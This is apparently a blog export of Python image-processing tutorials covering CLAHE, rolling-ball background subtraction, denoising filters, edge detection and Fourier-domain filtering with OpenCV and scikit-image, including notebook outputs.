  • Adaptive histogram equalization divides the image into small blocks ($8\times8$ tiles by default in OpenCV).
  • Each block is histogram-equalized.
  • To minimize noise amplification, contrast limiting is applied (default clip limit of 40 in OpenCV).
    clahe = cv2.createCLAHE(clipLimit=3.0, tileGridSize=(8, 8))
    clahe_img = clahe.apply(l)
    plt.hist(clahe_img.flat, bins=100, range=(0, 255))
(plt.hist output: per-bin counts and 101 bin edges from 0.0 to 255.0; the CLAHE result spreads the values while keeping the peak heights limited, <BarContainer object of 100 artists>)

    png

updated_lab_img2 = cv2.merge((clahe_img, a, b))
CLAHE_img = cv2.cvtColor(updated_lab_img2, cv2.COLOR_LAB2BGR)

    fig = plt.figure(figsize=(12, 12))
    ax1 = fig.add_subplot(131)
    ax1.imshow(img, cmap='gray')
    ax1.title.set_text('Original image')
    ax2 = fig.add_subplot(132)
    ax2.imshow(hist_eq_img, cmap='gray')
    ax2.title.set_text('Equalized image')
    ax3 = fig.add_subplot(133)
    ax3.imshow(CLAHE_img, cmap='gray')
    ax3.title.set_text('CLAHE Image')

    png

    Tutorial 43 - Shading correction using rolling ball background subtraction

    Rolling Ball Background Subtraction - ImageJ

This plugin tries to correct for an unevenly illuminated background by using a “rolling ball” algorithm.
A local background value is determined for every pixel by averaging over a very large ball around the pixel. This value is hereafter subtracted from the original image, hopefully removing large spatial variations of the background intensities. The radius should be set to at least the size of the largest object that is not part of the background.
This plugin implements (differently) the same algorithm as the one built into ImageJ in the Process › Subtract Background menu, but adds a useful Preview capability. Also, to display the subtracted background in a separate (new) window, hold the ALT key when pressing “OK” (Preview must be off).
    The rolling-ball algorithm was inspired by Stanley Sternberg’s article, “Biomedical Image Processing”, IEEE Computer, January 1983.


• Popular ImageJ plugin for background subtraction.
• Only works on 8-bit grey images.
• “Imagine that the 2D grayscale image has a third (height) dimension given by the image value at every point in the image, creating a surface. A ball of given radius is rolled over the bottom side of this surface; the hull of the volume reachable by the ball is the background.”
• A great algorithm for particle-detection-type applications. A rolling-ball sketch in scikit-image follows below.
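Besides the opencv-rolling-ball package used in the 2nd approach below, scikit-image also ships an implementation. A minimal sketch, assuming skimage >= 0.19 and reusing the tutorial's Ti_powder.tif image (the radius here is an illustrative guess):

from skimage import io, util
from skimage.restoration import rolling_ball

img = util.img_as_ubyte(io.imread("images/Ti_powder.tif", as_gray=True))

# rolling_ball estimates a dark background, so invert first for a light one
inverted = util.invert(img)
background_inv = rolling_ball(inverted, radius=50)  # radius >= size of largest foreground object

# subtract in inverted space, then invert back
corrected = util.invert(inverted - background_inv)
background = util.invert(background_inv)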

1st approach: Perform CLAHE

• Equalize the lighting by performing CLAHE on the luminance (L) channel.
• The equalization part was already covered as part of the previous tutorials on CLAHE.
• This kind of works, but you can still see shading after the correction.
    import cv2
    import numpy as np

    img = cv2.imread("images/Ti_powder.tif", 1)

    lab_img = cv2.cvtColor(img, cv2.COLOR_BGR2LAB)
    l, a, b = cv2.split(lab_img)


    clahe = cv2.createCLAHE(clipLimit=3, tileGridSize=(8,8))
    clahe_img = clahe.apply(l)
    CLAHE_img = cv2.merge((clahe_img,a,b))

    corrected_image = cv2.cvtColor(CLAHE_img, cv2.COLOR_LAB2BGR)

    cv2.imshow("Original image", img)
    cv2.imshow("Corrected image", corrected_image)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    2nd approach:

• Apply rolling-ball background subtraction.
    • pip install opencv-rolling-ball

    pip install opencv-rolling-ball
(pip output: builds a wheel for opencv-rolling-ball, then 'Successfully installed opencv-rolling-ball-1.0.1'. Note: you may need to restart the kernel to use updated packages.)
    import cv2
    from cv2_rolling_ball import subtract_background_rolling_ball
    from matplotlib import pyplot as plt

    img = cv2.imread("images/Ti_powder.tif", 0)

radius = 20
final_img, background = subtract_background_rolling_ball(img, radius, light_background=True,
                                                         use_paraboloid=False, do_presmooth=True)


# Optionally perform CLAHE to equalize the histogram for better segmentation;
# otherwise the image may appear washed out.

    clahe = cv2.createCLAHE(clipLimit=3, tileGridSize=(8,8))
    clahe_img = clahe.apply(final_img)

    #cv2.imshow("Original image", img)
    cv2.imshow("Background image", background)
    cv2.imshow("AFter background subtraction", final_img)
    cv2.imshow("After CLAHE", clahe_img)

    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    ]]>
/posts/DIP-Introductory%20python%20tutorials%20for%20image%20processing(29-41)-Image%20Filtering/ - Main text

Tutorial 29 - Basic image processing using scikit-image library

Scaling

    Rescale, resize, and downscale — skimage v0.19.2 docs

• Rescale resizes an image by a given scale factor, which can be a single float or one value per axis.
• Resize does the same, but lets you specify the output image shape instead of a scale factor.
• Downscale downsamples an n-dimensional image by integer factors, using the local mean of each block whose size is passed as a function argument.
    from matplotlib import pyplot as plt
    from skimage import io, color
    from skimage.transform import rescale, resize, downscale_local_mean
img = io.imread('images/Osteosarcoma_01.tif', as_gray=True)  # read the file

img_rescaled = rescale(img, 1.0 / 4.0, anti_aliasing=False)  # scale by a factor

img_resized = resize(img, (200, 200), anti_aliasing=True)  # resize to a target shape
    plt.imshow(img, cmap='gray')
    <matplotlib.image.AxesImage at 0x212d8734a48>

    png

    plt.imshow(img_rescaled, cmap='gray')
    <matplotlib.image.AxesImage at 0x212db1f7ac8>

    png

    plt.imshow(img_resized, cmap='gray')
    <matplotlib.image.AxesImage at 0x212db2830c8>

    png

img_downscaled = downscale_local_mean(img, (4, 3))  # downsample by the local mean over (4, 3) blocks
    plt.imshow(img_downscaled, cmap='gray')
    <matplotlib.image.AxesImage at 0x212db506788>

    png

Gaussian blur

    from skimage import io
    from skimage.filters import gaussian, sobel
    img = io.imread("images/Osteosarcoma_01_25Sigma_noise.tif")
    plt.imshow(img)
    gaussian_using_skimage = gaussian(img, sigma=1, mode='constant', cval=0.0)
    plt.imshow(gaussian_using_skimage)
(RuntimeWarning from skimage: Images with dimensions (M, N, 3) are interpreted as 2D+RGB by default. Use `multichannel=False` to interpret as 3D image with last dimension of length 3.)
<matplotlib.image.AxesImage at 0x212dbb52848>

    png

Sobel edge detection

    img_gray = io.imread("images/Osteosarcoma_01.tif", as_gray=True)
    sobel_img = sobel(img_gray) #Works only on 2D (gray) images
    plt.imshow(sobel_img, cmap='gray')
    <matplotlib.image.AxesImage at 0x212dc0185c8>

    png
Tutorial 30 - Basic image processing using opencv in python

Use OpenCV to work with the image below:

    jpg

OpenCV reads images with BGR channel order, so displaying them directly with matplotlib shifts the colors.

    import cv2
    import matplotlib.pyplot as plt

    img = cv2.imread('images/RGBY.jpg', 1) # Color is BGR not RGB
    plt.imshow(img)
    <matplotlib.image.AxesImage at 0x1e3d6809370>

    png
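To display the colors correctly in matplotlib, convert from BGR to RGB first, e.g.:

plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))  # BGR -> RGB so matplotlib shows the true colors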

Scaling

    import cv2
    import matplotlib.pyplot as plt

    img = cv2.imread('images/RGBY.jpg', 1)
    resized = cv2.resize(img, None, fx=2, fy=2, interpolation=cv2.INTER_CUBIC)

    cv2.imshow('original pic', img)
    cv2.imshow('resized pic', resized)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    img.shape
    (400, 200, 3)
    print('Top left', img[0, 0])
    print('Top right', img[0, -1])
    print('Bottom left', img[-1, 0])
    print('Bottom right', img[-1, -1])
Top left [254   0   0]
Top right [  1 255 255]
Bottom left [  1 255   0]
Bottom right [ 42   0 255]

Splitting color channels

    blue = img[:, :, 0]
    green = img[:, :, 1]
    red = img[:, :, 2]

    blue, green, red = cv2.split(img)
    cv2.imshow('red pic', red)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

Merging color channels

    img_merged = cv2.merge((blue, green, red))

    cv2.imshow('merged pic', img_merged)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

Canny edge detection

    import cv2

    img = cv2.imread('images/Osteosarcoma_01.tif', 0)
    edges = cv2.Canny(img, 100, 200)

    cv2.imshow('Original Image', img)
    cv2.imshow('Canny', edges)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Tutorial 31 - Image filtering in python - Unsharp mask

    Unsharp Mask(USM)锐化算法的的原理及其实现。_大熊背的博客-CSDN 博客_usm 锐化算法

    png

$\text{sharpened} = \text{original} + \text{amount} \times (\text{original} - \text{blurred})$

Principle

    from skimage import io, img_as_float
    from skimage.filters import unsharp_mask
    from skimage.filters import gaussian

    img = img_as_float(io.imread('images/sandstone_blur_2sigma.tif', as_gray=True))
gaussian_img = gaussian(img, sigma=2, mode='constant', cval=0.0)  # blurred copy
img2 = (img - gaussian_img) * 2.  # amount * (original - blurred)
img3 = img + img2  # sharpened result

    from matplotlib import pyplot as plt

    fig = plt.figure(figsize=(10, 10))

    ax1 = fig.add_subplot(131)
    ax1.imshow(img, cmap='gray')
    ax1.title.set_text('1st')

    ax2 = fig.add_subplot(132)
    ax2.imshow(img2, cmap='gray')
    ax2.title.set_text('img2')

    ax3 = fig.add_subplot(133)
    ax3.imshow(img3, cmap='gray')
    ax3.title.set_text('img3')

    plt.show()

    png

The unsharp_mask function

    from skimage import io
    from skimage.filters import unsharp_mask

    img = io.imread("images/sandstone_blur_2sigma.tif")

    #Radius defines the degree of blurring
    #Amount defines the multiplication factor for original - blurred image
    unsharped_img = unsharp_mask(img, radius=3, amount=2)


    import matplotlib.pyplot as plt
    fig = plt.figure(figsize=(12, 12))
    ax1 = fig.add_subplot(1,2,1)
    ax1.imshow(img, cmap='gray')
    ax1.title.set_text('Input Image')
    ax2 = fig.add_subplot(1,2,2)
    ax2.imshow(unsharped_img, cmap='gray')
    ax2.title.set_text('Unsharped Image')

    png

    Tutorial 32 - Image filtering in python - Gaussian denoising for noise reduction

    png

    import cv2
    from skimage import io, img_as_float
    from skimage.filters import gaussian

    img_gaussian_noise = img_as_float(io.imread('images/Osteosarcoma_01_25Sigma_noise.tif', as_gray=True))
    img_salt_pepper_noise = img_as_float(io.imread('images/Osteosarcoma_01_8bit_salt_pepper.tif', as_gray=True))

    img = img_gaussian_noise

    gaussian_using_cv2 = cv2.GaussianBlur(img, (3,3), 0, borderType=cv2.BORDER_CONSTANT)

    gaussian_using_skimage = gaussian(img, sigma=1, mode='constant', cval=0.0)
# sigma defines the std dev of the Gaussian kernel; slightly different from
# how it is defined in cv2


    cv2.imshow("Original", img)
    cv2.imshow("Using cv2gaussian", gaussian_using_cv2)
    cv2.imshow("Using skimage", gaussian_using_skimage)
    #cv2.imshow("Using scipy2", conv_using_scipy2)

    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png
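If you want the two libraries to agree more closely, specify sigma explicitly in cv2 and let it derive the kernel size. A quick illustrative check on random data (the values and setup here are assumptions, not from the tutorial):

import cv2
import numpy as np
from skimage.filters import gaussian

rng = np.random.default_rng(0)
test = rng.random((64, 64)).astype(np.float32)

# ksize=(0, 0) lets cv2 derive the kernel size from sigma
via_cv2 = cv2.GaussianBlur(test, (0, 0), 1, borderType=cv2.BORDER_REPLICATE)
via_skimage = gaussian(test, sigma=1, mode='nearest')

print(np.abs(via_cv2 - via_skimage).max())  # small, though not exactly zero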

    Tutorial 33 - Image filtering in python - Median filter for denoising images

• Median filtering cleans up salt-and-pepper noise

    png

    OpenCV

    import cv2
    # Needs 8 bit, not float.
    img_gaussian_noise = cv2.imread('images/Osteosarcoma_01_25Sigma_noise.tif', 0)
    img_salt_pepper_noise = cv2.imread('images/Osteosarcoma_01_8bit_salt_pepper_cropped.tif', 0)

    img = img_gaussian_noise

    median_using_cv2 = cv2.medianBlur(img, 3)

    skimage

    from skimage.filters import median
    from skimage.morphology import disk

    """
    Disk creates a circular structuring element,
    similar to a mask with specific radius
    Disk 创建一个圆形结构元素,类似于具有特定半径的掩码
    """
    disk(3)
array([[0, 0, 0, 1, 0, 0, 0],
       [0, 1, 1, 1, 1, 1, 0],
       [0, 1, 1, 1, 1, 1, 0],
       [1, 1, 1, 1, 1, 1, 1],
       [0, 1, 1, 1, 1, 1, 0],
       [0, 1, 1, 1, 1, 1, 0],
       [0, 0, 0, 1, 0, 0, 0]], dtype=uint8)
    median_using_skimage = median(img, disk(3), mode='constant', cval=0.0)
    cv2.imshow('Original', img)
    cv2.imshow('cv2median', median_using_cv2)
    cv2.imshow('Using skimage median', median_using_skimage)

    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Tutorial 34 - Image filtering in python - Bilateral filter for image denoising

    双边滤波 - Bilateral Filter - 知乎 (zhihu.com)

    OpenCV

    import cv2

    img_gaussian_noise = cv2.imread('images/Osteosarcoma_01_25Sigma_noise.tif', 0)
    img = img_gaussian_noise
    bilateral_using_cv2 = cv2.bilateralFilter(img, 5, 20, 100, borderType=cv2.BORDER_CONSTANT)

    cv2.imshow("Original", img)
    cv2.imshow("cv2 bilateral", bilateral_using_cv2)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Skimage

The video says this is slow… and it does indeed seem quite slow.

    import cv2
    from skimage.restoration import denoise_bilateral

    img_gaussian_noise = cv2.imread('images/Osteosarcoma_01_25Sigma_noise.tif', 0)
    img = img_gaussian_noise
bilateral_using_skimage = denoise_bilateral(img, sigma_color=0.05, sigma_spatial=15,
                                            multichannel=False)
    cv2.imshow("Using skimage bilateral", bilateral_using_skimage)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Tutorial 35 - Image filtering in python - Non-local means -NLM- filter for image denoising

    NLM 去噪算法_SongpingWang 的博客-CSDN 博客_nlm 去噪

    png

    OpenCV

    import cv2
    import numpy as np
    from skimage import io, img_as_float
    from skimage.restoration import denoise_nl_means, estimate_sigma

    img = img_as_float(io.imread('images/Osteosarcoma_01_25Sigma_noise.tif', as_gray=False))
sigma_est = np.mean(estimate_sigma(img, multichannel=True))  # average the sigma estimate over all three channels
(FutureWarning: `multichannel` is a deprecated argument name for `estimate_sigma` and will be removed in version 1.0; use `channel_axis` instead)
denoise_img = denoise_nl_means(img, h=1.15 * sigma_est,
                               fast_mode=True,
                               patch_size=5,
                               patch_distance=3,
                               multichannel=False)
(FutureWarning: `multichannel` is a deprecated argument name for `denoise_nl_means` and will be removed in version 1.0; use `channel_axis` instead)
    cv2.imshow("Original", img)
    cv2.imshow("NLM Filtered", denoise_img)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    Skimage

    from skimage import img_as_ubyte
    import cv2

    img_as_8btype = img_as_ubyte(img)
    denoise_img_as_8byte = img_as_ubyte(denoise_img)

    original_img = cv2.cvtColor(img_as_8btype, cv2.COLOR_BGR2RGB)
    final_denoised_img = cv2.cvtColor(denoise_img_as_8byte, cv2.COLOR_BGR2RGB)

    cv2.imshow("Original", img)
    cv2.imshow("NLM Filtered", denoise_img)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Tutorial 36 - Image filtering in python - Total variation filter -TVF- for image denoising

    如何理解全变分(Total Variation,TV)模型?- 知乎 (zhihu.com)

    import cv2
    from skimage import io, img_as_float
    from skimage.restoration import denoise_tv_chambolle

    img = img_as_float(io.imread('images/Osteosarcoma_01_25Sigma_noise.tif'))
    import matplotlib.pyplot as plt

    plt.hist(img.flat, bins=100, range=(0, 1))
(plt.hist output: counts in 100 bins with edges from 0.0 to 1.0; the distribution is heavily skewed toward low intensities, <BarContainer object of 100 artists>)

    png

• denoise_tv_chambolle(image, weight=0.1, eps=0.0002, n_iter_max=200, multichannel=False)
  • weight: The greater the weight, the more denoising (at the expense of fidelity to the input).
  • eps: Relative difference in the cost-function value that determines the stopping criterion.
  • n_iter_max: Maximum number of iterations used for the optimization.
    denoise_img = denoise_tv_chambolle(img, weight=0.1, eps=0.0002, n_iter_max=200, multichannel=True)
(FutureWarning: `multichannel` is a deprecated argument name for `denoise_tv_chambolle` and will be removed in version 1.0; use `channel_axis` instead)
    cv2.imshow('Original', img)
    cv2.imshow('TV Filtered', denoise_img)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Tutorial 37 - Image filtering in python - Block matching and 3D filtering -BM3D- for image denoising

    BM3D 算法学习 - 知乎

    png

    pip install bm3d
(pip output: downloads bm3d-3.0.9-py3-none-any.whl (8.4 MB), then 'Successfully installed bm3d-3.0.9'. Note: you may need to restart the kernel to use updated packages.)
    from skimage import io, img_as_float
    import bm3d
    import cv2

    noisy_img = img_as_float(io.imread("images/Osteosarcoma_01_25Sigma_noise.tif", as_gray=True))

    BM3D_denoised_image = bm3d.bm3d(noisy_img, sigma_psd=0.2, stage_arg=bm3d.BM3DStages.HARD_THRESHOLDING)
• The bm3d library is not well documented yet, but looking into the source code:
  • sigma_psd - noise standard deviation.
  • stage_arg: determines whether to perform hard thresholding or Wiener filtering.
  • stage_arg = BM3DStages.HARD_THRESHOLDING or BM3DStages.ALL_STAGES (slow but powerful).

ALL_STAGES performs both hard thresholding and Wiener filtering, as sketched below.
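A sketch of the stronger variant, reusing the same noisy_img:

# Both stages: hard thresholding followed by Wiener filtering (slower, usually cleaner)
BM3D_all_stages = bm3d.bm3d(noisy_img, sigma_psd=0.2, stage_arg=bm3d.BM3DStages.ALL_STAGES)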

    cv2.imshow("Original", noisy_img)
    cv2.imshow("Denoised", BM3D_denoised_image)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Tutorial 38 - Image filtering in python - Edge detection

Edge detection filters

• Roberts
  • Apply a horizontal and a vertical filter, one after the other.
  • Both filters are applied (convolved) with the image.
  • Computes the sum of the squares of the differences between diagonally adjacent pixels.
  • Highlights regions of high spatial gradient, which often correspond to edges.

    png

• Sobel
  • Very similar to Roberts, except with a $3\times3$ operator.

    png

• Scharr
  • Typically used to identify gradients along the x-axis (dx=1, dy=0) and y-axis (dx=0, dy=1) independently.
  • Performance is quite similar to the Sobel filter.
• Farid
  • Farid and Simoncelli propose using a pair of kernels, one for interpolation and another for differentiation (similar to Sobel).
  • Fixed-size kernels: $5\times5$ (interpolation) and $7\times7$ (differentiation).
• Prewitt
  • The Prewitt operator is similar to Sobel, except for the operator values.
  • Very fast, similar to Sobel. (A Farid example is sketched after the code below.)

    png

    import cv2

    img = cv2.imread('images/sandstone.tif', 0)

    png

    from skimage.filters import roberts, sobel, scharr, prewitt

    roberts_img = roberts(img)
    sobel_img = sobel(img)
    scharr_img = scharr(img)
    prewitt_img = prewitt(img)
    cv2.imshow("Roberts", roberts_img)
    cv2.imshow("Sobel", sobel_img)
    cv2.imshow("Scharr", scharr_img)
    cv2.imshow("Prewitt", prewitt_img)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png
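The Farid filter described above is not exercised in the block; skimage exposes it alongside the others. A minimal sketch under that assumption, reusing the same grayscale img and cv2 import:

from skimage.filters import farid, farid_h, farid_v

farid_img = farid(img)  # gradient magnitude with Farid-Simoncelli kernels
farid_x = farid_h(img)  # horizontal-edge response
farid_y = farid_v(img)  # vertical-edge response

cv2.imshow("Farid", farid_img)
cv2.waitKey(0)
cv2.destroyAllWindows()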

    Tutorial 39 - Image filtering in python - Edge detection using Canny

• Multi-stage algorithm for edge detection:
  • Step 1: Noise reduction - typically uses a Gaussian filter (but any denoising can be used).
  • Step 2: Gradient calculation - detect edges, typically along 4 directions: horizontal, vertical, and the two diagonals (e.g. using Sobel).
  • Step 3: Non-maximum suppression - thin out edges by keeping only the pixels with the maximum value along the edge direction.
  • Step 4: Double threshold - determine potential edges by double thresholding, classifying pixels as strong, weak, or irrelevant.
  • Step 5: Edge tracking by hysteresis - convert weak edge pixels to strong ones based on their neighboring pixels.
    from skimage import io, filters, feature
    import matplotlib.pyplot as plt
    from skimage.color import rgb2gray
    import cv2
    import numpy as np


    img = cv2.imread('images/sandstone.tif', 0)

    #Canny
    canny_edge = cv2.Canny(img, 50, 80) #Supply Thresholds 1 and 2

    #Autocanny
    sigma = 0.3
    median = np.median(img)

    # apply automatic Canny edge detection using the computed median
    lower = int(max(0, (1.0 - sigma) * median))
    #Lower threshold is sigma % lower than median
    #If the value is below 0 then take 0 as the value

    upper = int(min(255, (1.0 + sigma) * median))
    #Upper threshold is sigma% higher than median
#If the value is larger than 255 then take 255 as the value

    auto_canny = cv2.Canny(img, lower, upper)


    cv2.imshow("Canny", canny_edge)
    cv2.imshow("Auto Canny", auto_canny)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png
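The imports above also pull in skimage's feature module, which has its own Canny; it runs on float images and takes sigma for the built-in Gaussian step. A sketch under those assumptions, reusing img, cv2, and np from the block above (the threshold values are illustrative):

from skimage import feature, img_as_float

img_float = img_as_float(img)  # skimage's canny expects a 2D float image
canny_sk = feature.canny(img_float, sigma=2, low_threshold=0.1, high_threshold=0.2)

cv2.imshow("skimage Canny", canny_sk.astype(np.uint8) * 255)  # boolean mask -> 8-bit for display
cv2.waitKey(0)
cv2.destroyAllWindows()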

    Tutorial 40 - What is Fourier transform and how is it relevant for image processing

Fourier Transform

    png

• Continuous Fourier transform

  $X(f)=\int_{-\infty}^{\infty} x(t)\cdot e^{-j 2\pi f t}\,dt$

• Discrete Fourier transform

  $X(k) = \frac{1}{N} \sum_{n=0}^{N-1} x({\color{Red}n}) \cdot e^{-{\color{Blue}j 2\pi} k n / N}$

  • ${\color{Red}n}$: index into the input signal (pixel values)
  • ${\color{Blue}j}$: the imaginary unit of the complex exponential
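To make the discrete formula concrete, here is a tiny numeric check (note that NumPy's FFT convention omits the 1/N factor on the forward transform):

import numpy as np

x = np.array([1.0, 2.0, 3.0, 4.0])  # a 4-sample signal
N = len(x)
n = np.arange(N)

# direct evaluation of X(k) = sum_n x(n) * exp(-j*2*pi*k*n/N)
X_direct = np.array([np.sum(x * np.exp(-2j * np.pi * k * n / N)) for k in range(N)])

print(np.allclose(X_direct, np.fft.fft(x)))  # True: matches NumPy's FFT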

Code

• Create a sine wave
    import cv2
    import matplotlib.pyplot as plt
    import numpy as np
    # Generate a 2D sine wave image
    x = np.arange(256) # generate values from 0 to 255 (our image size)
    y = np.sin(2 * np.pi * x / 3) # calculate sine of x values
    # Divide by a smaller number above to increase the frequency.
    y += max(y) # offset sine wave by the max value to go out of negative range of sine

    # Generate a 256 * 256 image (2D array of the sine wave)
    # create 2-D array of sine-wave
    img = np.array([[y[j] * 127 for j in range(256)] for i in range(256)], dtype=np.uint8)
    plt.imshow(img)
    <matplotlib.image.AxesImage at 0x246a404a700>

    png

# Change the frequency
    # Generate a 2D sine wave image
    x = np.arange(256) # generate values from 0 to 255 (our image size)
    y = np.sin(2 * np.pi * x / 30) # calculate sine of x values
    # Divide by a smaller number above to increase the frequency.
    y += max(y) # offset sine wave by the max value to go out of negative range of sine

    # Generate a 256 * 256 image (2D array of the sine wave)
    # create 2-D array of sine-wave
    img = np.array([[y[j] * 127 for j in range(256)] for i in range(256)], dtype=np.uint8)

    plt.imshow(img)
    <matplotlib.image.AxesImage at 0x246a542f1c0>

    png

    OpenCV

    dft = cv2.dft(np.float32(img), flags=cv2.DFT_COMPLEX_OUTPUT)

    #Shift DFT. First check the output without the shift
    #Without shifting the data would be centered around origin at the top left
    #Shifting it moves the origin to the center of the image.
    dft_shift = np.fft.fftshift(dft)

    #Calculate magnitude spectrum from the DFT (Real part and imaginary part)
    #Added 1 as we may see 0 values and log of 0 is indeterminate
    magnitude_spectrum = 20 * np.log((cv2.magnitude(dft_shift[:, :, 0], dft_shift[:, :, 1]))+1)


    #As the spatial frequency increases (bars closer),
    #the peaks in the DFT amplitude spectrum move farther away from the origin

    #Center represents low frequency and the corners high frequency (with DFT shift).
    #To build high pass filter block center corresponding to low frequencies and let
    #high frequencies go through. This is nothing but an edge filter.
    fig = plt.figure(figsize=(12, 12))
    ax1 = fig.add_subplot(2,2,1)
    ax1.imshow(img)
    ax1.title.set_text('Input Image')
    ax2 = fig.add_subplot(2,2,2)
    ax2.imshow(magnitude_spectrum)
    ax2.title.set_text('FFT of image')
    plt.show()

    png

In the plot on the right, for every point:

1) Its distance from the center encodes the frequency.

2) The direction from the center to the point gives the direction of the plane wave.

3) The gray value at that point encodes its amplitude.
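One way to see this: place a single conjugate-symmetric pair of spikes in an otherwise empty centered spectrum and invert it; the result is a plane wave whose frequency and orientation match the spikes' distance and direction from the center. A small illustrative sketch with NumPy's FFT:

import numpy as np
import matplotlib.pyplot as plt

spec = np.zeros((256, 256), dtype=complex)
cy, cx = 128, 128
spec[cy, cx + 10] = 1.0  # spike 10 cycles from the center along x
spec[cy, cx - 10] = 1.0  # its symmetric partner keeps the inverse transform real

wave = np.fft.ifft2(np.fft.ifftshift(spec)).real  # a horizontal-frequency plane wave
plt.imshow(wave, cmap='gray')
plt.show()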

    img = cv2.imread('images/sandstone.tif', 0) # load an image
    dft = cv2.dft(np.float32(img), flags=cv2.DFT_COMPLEX_OUTPUT)
    dft_shift = np.fft.fftshift(dft)
    magnitude_spectrum = 20 * np.log((cv2.magnitude(dft_shift[:, :, 0], dft_shift[:, :, 1]))+1)

    fig = plt.figure(figsize=(12, 12))
    ax1 = fig.add_subplot(2,2,1)
    ax1.imshow(img)
    ax1.title.set_text('Input Image')
    ax2 = fig.add_subplot(2,2,2)
    ax2.imshow(magnitude_spectrum)
    ax2.title.set_text('FFT of image')
    plt.show()

    png

    Tutorial 41 - Image filtering using Fourier transform in python

    import cv2
    from matplotlib import pyplot as plt
    import numpy as np

    img = cv2.imread('images/sandstone.tif', 0) # load an image
• The output is a 2D complex array: the 1st channel holds the real part and the 2nd the imaginary part.
• For FFT in OpenCV, the input image needs to be converted to float32.
    dft = cv2.dft(np.float32(img), flags=cv2.DFT_COMPLEX_OUTPUT)
• Rearranges the Fourier transform by shifting the zero-frequency component to the center of the array.
• Otherwise it sits at the top-left corner of the image (array).
    dft_shift = np.fft.fftshift(dft)
• The magnitude of the spectrum is 20*log(abs(f)).
• For values that are 0 we may end up with indeterminate values for the log.
• So we can add 1 to the array to avoid a warning.
magnitude_spectrum = 20 * np.log(cv2.magnitude(dft_shift[:, :, 0], dft_shift[:, :, 1]) + 1)
• Edge detection using the Fourier transform

• Circular HPF mask: the center circle is 0, the rest are all ones.

• Can be used for edge detection, because the low frequencies at the center are blocked and only the high frequencies get through.

• Edges are high-frequency components.

• Amplifies noise.
    rows, cols = img.shape
    crow, ccol = int(rows / 2), int(cols / 2)

    mask = np.ones((rows, cols, 2), np.uint8)
    r = 80
    center = [crow, ccol]
    x, y = np.ogrid[:rows, :cols]
    mask_area = (x - center[0]) ** 2 + (y - center[1]) ** 2 <= r*r
    mask[mask_area] = 0
• Apply the mask and inverse DFT: multiply the Fourier-transformed image (values) with the mask values.
    fshift = dft_shift * mask
• Get the magnitude spectrum (only for plotting purposes).
    fshift_mask_mag = 20 * np.log(cv2.magnitude(fshift[:, :, 0], fshift[:, :, 1]))
(RuntimeWarning: divide by zero encountered in log)
• Inverse shift to move the origin back to the top left.
    f_ishift = np.fft.ifftshift(fshift)
• Inverse DFT to convert back to the image domain from the frequency domain.
• The result will be complex numbers.
    img_back = cv2.idft(f_ishift)
• Magnitude spectrum in the image domain.
    img_back = cv2.magnitude(img_back[:, :, 0], img_back[:, :, 1])
• Plotting
    fig = plt.figure(figsize=(12, 12))
    ax1 = fig.add_subplot(2,2,1)
    ax1.imshow(img, cmap='gray')
    ax1.title.set_text('Input Image')
    ax2 = fig.add_subplot(2,2,2)
    ax2.imshow(magnitude_spectrum, cmap='gray')
    ax2.title.set_text('FFT of image')
    ax3 = fig.add_subplot(2,2,3)
    ax3.imshow(fshift_mask_mag, cmap='gray')
    ax3.title.set_text('FFT + Mask')
    ax4 = fig.add_subplot(2,2,4)
    ax4.imshow(img_back, cmap='gray')
    ax4.title.set_text('After inverse FFT')
    plt.show()

    png

• Circular LPF mask: the center circle is 1, the rest are all zeros.
• Only lets low-frequency components through - smooth regions.
• Can smooth out noise, but blurs edges.
    rows, cols = img.shape
    crow, ccol = int(rows / 2), int(cols / 2)

    mask = np.zeros((rows, cols, 2), np.uint8)
    r = 100
    center = [crow, ccol]
    x, y = np.ogrid[:rows, :cols]
    mask_area = (x - center[0]) ** 2 + (y - center[1]) ** 2 <= r*r
    mask[mask_area] = 1

# Band-pass filter: concentric ring mask; only the points between r_in and r_out are ones
    rows, cols = img.shape
    crow, ccol = int(rows / 2), int(cols / 2)

    mask = np.zeros((rows, cols, 2), np.uint8)
    r_out = 80
    r_in = 10
    center = [crow, ccol]
    x, y = np.ogrid[:rows, :cols]
mask_area = np.logical_and(((x - center[0]) ** 2 + (y - center[1]) ** 2 >= r_in ** 2),
                           ((x - center[0]) ** 2 + (y - center[1]) ** 2 <= r_out ** 2))
    mask[mask_area] = 1
    fshift = dft_shift * mask
    fshift_mask_mag = 20 * np.log(cv2.magnitude(fshift[:, :, 0], fshift[:, :, 1]))
    f_ishift = np.fft.ifftshift(fshift)
    img_back = cv2.idft(f_ishift)
    img_back = cv2.magnitude(img_back[:, :, 0], img_back[:, :, 1])
    fig = plt.figure(figsize=(12, 12))
    ax1 = fig.add_subplot(2,2,1)
    ax1.imshow(img, cmap='gray')
    ax1.title.set_text('Input Image')
    ax2 = fig.add_subplot(2,2,2)
    ax2.imshow(magnitude_spectrum, cmap='gray')
    ax2.title.set_text('FFT of image')
    ax3 = fig.add_subplot(2,2,3)
    ax3.imshow(fshift_mask_mag, cmap='gray')
    ax3.title.set_text('FFT + Mask')
    ax4 = fig.add_subplot(2,2,4)
    ax4.imshow(img_back, cmap='gray')
    ax4.title.set_text('After inverse FFT')
    plt.show()
(RuntimeWarning: divide by zero encountered in log)

    png

    ]]>
    + 正文

    Tutorial 29 -Basic image processing using scikit-image library

    缩放

    Rescale, resize, and downscale — skimage v0.19.2 docs

    • Rescale 操作按给定的缩放因子调整图像的大小。缩放因子可以是单个浮点值,也可以是多个值——每个轴上都有一个。
    • Resize 也有同样的作用,但允许指定输出图像的形状而不是缩放因子。
